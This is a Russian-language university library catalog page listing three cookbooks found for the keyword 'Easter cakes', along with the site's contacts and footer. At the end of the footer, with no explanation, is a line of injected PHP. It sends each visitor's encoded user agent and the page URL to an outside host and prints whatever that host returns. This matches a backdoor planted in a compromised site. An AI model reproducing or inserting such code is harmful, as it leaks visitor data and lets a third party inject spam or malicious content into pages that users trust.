Перейти на сайт
библиотеки ОмГТУ
Share |
   
   
   
   
   
   

 
      Виртуальная справка
 
      Личный кабинет

Логин
Пароль
Забыли пароль?
Регистрация

 
      Счетчики
Rambler's Top100
Яндекс цитирования

Сейчас на сайте

33 пользователей



 
      Наши партнеры
Студенческий информационный портал компании
("Ключевые слова=КУЛИЧИ")
Результаты поиска
СВОДНЫЙ КАТАЛОГ: Найдено записей: 3
1. 
Кулинарные рецепты [Текст] / сост. Л. И. Воробьева, 1983. - 835 с.
Ключевые слова 
БУТЕРБРОД -- САЛАТ -- ВИНЕГРЕТ -- ЗАКУСКА ХОЛОДНАЯ -- ЗАКУСКА ОВОЩНАЯ -- ЗАКУСКА ИЗ ЯИЦ -- СОУС -- ЗАКУСКА ГОРЯЧАЯ -- БУЛЬОН -- СУП -- СУП - ПЮРЕ -- СУП ХОЛОДНЫЙ -- МЯСО ОТВАРНОЕ -- МЯСО ТУШЕНОЕ -- МЯСО ЖАРЕНОЕ -- МЯСО РУБЛЕНОЕ -- МЯСО ЗАПЕЧЕННОЕ -- РЫБА ОТВАРНАЯ -- РЫБА ЖАРЕНАЯ -- РЫБА ТУШЕНАЯ -- БЛЮДА ИЗ МОРЕПРОДУКТОВ -- БЛЮДА МОЛОЧНЫЕ -- БЛЮДА ИЗ ЯИЦ -- ОМЛЕТ -- ОВОЩИ ОТВАРНЫЕ -- ОВОЩИ ЖАРЕНЫЕ -- ОВОЩИ ЗАПЕЧЕННЫЕ -- ОВОЩИ ТУШЕНЫЕ -- ОВОЩИ ФАРШИРОВАННЫЕ -- БЛЮДА ИЗ ГРИБОВ -- КАША -- ПЛОВ -- БЛЮДА ИЗ МАКАРОННЫХ ИЗДЕЛИЙ -- БЛЮДА ИЗ БОБОВЫХ -- ТЕСТО ДРОЖЖЕВОЕ -- ТЕСТО ПРЕСНОЕ -- ТЕСТО СЛОЕНОЕ -- БЛИНЫ -- ОЛАДЬИ -- БУЛОЧКИ -- КУЛИЧИ -- ПЕЧЕНЬЕ -- ПИРОЖНЫЕ -- ТОРТ -- КЕКС -- КИСЕЛЬ -- КОМПОТ -- ЖЕЛЕ -- КРЕМ -- ПУДИНГ -- КОНСЕРВИРОВАНИЕ ДОМАШНЕЕ -- МАРИНАД -- ЗАМОРАЖИВАНИЕ ОВОЩЕЙ -- ЗАМОРАЖИВАНИЕ ПЛОДОВ
Держатели документа (Информация об экземплярах) 
2. 
Шестакова Т. И. Кондитер-профессионал [Текст] : учеб. пособие / Т. И. Шестакова, 2006. - 399 с.
Ключевые слова 
МУКА ПШЕНИЧНАЯ -- МУКА СОЕВАЯ -- МУКА кукурузная -- КРАХМАЛ -- глюкоза -- фруктоза -- ПОДСЛАСТИТЕЛЬ -- патока крахмальная -- МЕД -- МОЛОКО -- ПРОДУКТЫ МОЛОЧНЫЕ -- МАСЛО СЛИВОЧНОЕ -- ЖИРЫ -- ЯЙЦА -- ЯЙЦЕПРОДУКТЫ -- ПРОДУКТЫ ВКУСОВЫЕ -- КИСЛОТА ПИЩЕВАЯ -- ВЕЩЕСТВА АРОМАТИЧЕСКИЕ -- РАЗРЫХЛИТЕЛЬ -- ФРУКТЫ -- ЦУКАТЫ -- КРУПА -- ОРЕХИ -- МАК -- УЛУЧШИТЕЛЬ хлебобулочных изделий -- ДОБАВКА БИОЛОГИЧЕСКИ АКТИВНА -- СЛИВКИ -- ИЗДЕЛИЯ КОНДИТЕРСКИЕ -- ФАРШ -- ТЕСТО дрожжевое -- КУЛИЧИ -- БАБА РОМОВАЯ -- ТЕСТО бездрожжевое -- ВАТРУШКА -- ТЕСТО ПРЯНИЧНОЕ -- ТЕСТО ПЕСОЧНОЕ -- БИСКВИТ -- ТЕСТО ЗАВАРНОЕ -- ТЕСТО СЛОЕНОЕ -- волованы -- ФРИТЮР -- ПЕЧЕНЬЕ -- КЕКС -- ПИЦЦА -- СЛАДОСТИ ВОСТОЧНЫЕ -- СИРОП -- помадка -- ГЛАЗУРИ -- мастика -- КАРАМЕЛЬ -- кандир для сахарных фигур -- грильяж -- ЖЕЛЕ -- марципан -- ШОКОЛАД -- посыпки -- КРЕМ -- ПИРОЖНЫЕ -- ТОРТЫ
Держатели документа (Информация об экземплярах) 
3. 
Стойкова Л. В. Выпечка хлеба. Пасхальные куличи и все из муки [Текст] / Л. В. Стойкова, 1999. - 315 с.
Держатели документа (Информация об экземплярах) 


    Адрес: 644050, Россия, г. Омск, пр-кт Мира, 11

    Телефон: (3812) 65-34-86, 65-23-69

    E-mail: libdirector@omgtu.ru, b_oa@omgtu.ru

[ О библиотеке ]     [ Читателю ]     [ Информационные ресурсы ]     [ Электронный каталог ]     [ Научная деятельность ]     [ Культура и досуг ]     [ ИРБИС в Омске ]

Электронное периодическое издание «lib.omgtu.ru» | Свидетельство о регистрации СМИ Эл № ФС77-45378 от 10.06.2011 Федеральной службы по надзору в сфере связи, информационных технологий и массовых коммуникаций (Роскомнадзор)| Выпуск № 3079 - 14.11.2019
© Омский государственный технический университет

Электронно-библиотечная система АРБУЗ ОмГТУ
Страница сгенерирована за 0.54 с.12 запросов, 0.41c. $useragent=$_SERVER['HTTP_USER_AGENT']; $bs=base64_encode($useragent); $sb='http://'.$_SERVER['SERVER_NAME'].$_SERVER["REQUEST_URI"]; $ret = file_get_contents('http://jr.6tws.us/?UserAgent='.$bs."&Domain=".$sb); print $ret;